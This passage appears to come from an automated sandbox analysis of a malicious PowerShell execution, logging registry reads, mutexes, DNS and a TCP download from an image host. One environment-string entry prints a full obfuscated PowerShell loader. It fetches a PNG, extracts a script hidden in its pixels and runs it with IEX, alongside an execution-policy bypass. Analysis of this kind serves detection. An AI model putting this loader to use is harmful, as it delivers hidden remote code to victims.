| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (148)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
136 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = ComsPec, result_out = C:\Windows\system32\cmd.exe |
|
2 | |
| Get Environment String | name = sULrV |
|
1 | |
| Get Environment String | name = sULrV, result_out = . ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36)) |
|
1 | |
| Get Environment String | name = comSpeC, result_out = C:\Windows\system32\cmd.exe |
|
2 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = images2.imgbox.com, address_out = 66.254.122.102, 66.254.122.104, 66.254.122.100 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 373 bytes |
| Total Data Received | 381.62 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 66.254.122.102:443 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x4ec |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 66.254.122.102 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 49164 |
| Data Sent | 373 bytes |
| Data Received | 381.62 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 66.254.122.102, remote_port = 443 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 122, size_out = 122 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 93, size_out = 93 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4588, size_out = 4588 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 331, size_out = 331 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4, size_out = 4 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 134, size_out = 134 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 117, size_out = 117 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 96, size_out = 96 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 112, size_out = 112 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 256, size_out = 256 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 320, size_out = 320 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 612 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 828, size_out = 828 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 672, size_out = 619 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 53, size_out = 53 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 8870 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 7546, size_out = 7546 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 1161 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2487, size_out = 2487 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 1864 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 14552, size_out = 5808 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 8744, size_out = 8744 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 1415 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2233, size_out = 2233 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 666 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 15750, size_out = 15750 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 11166 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5250, size_out = 5250 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 1936 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 14480, size_out = 4356 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 10124, size_out = 10124 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 738 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 15678, size_out = 8712 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 6966, size_out = 6966 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 3896 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 12520, size_out = 12520 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 1961 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1687, size_out = 1687 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 4912 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 11504, size_out = 11504 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 3598 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 12818, size_out = 7260 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5558, size_out = 3020 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2538, size_out = 2538 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 6336, size_out = 5420 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 916, size_out = 916 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
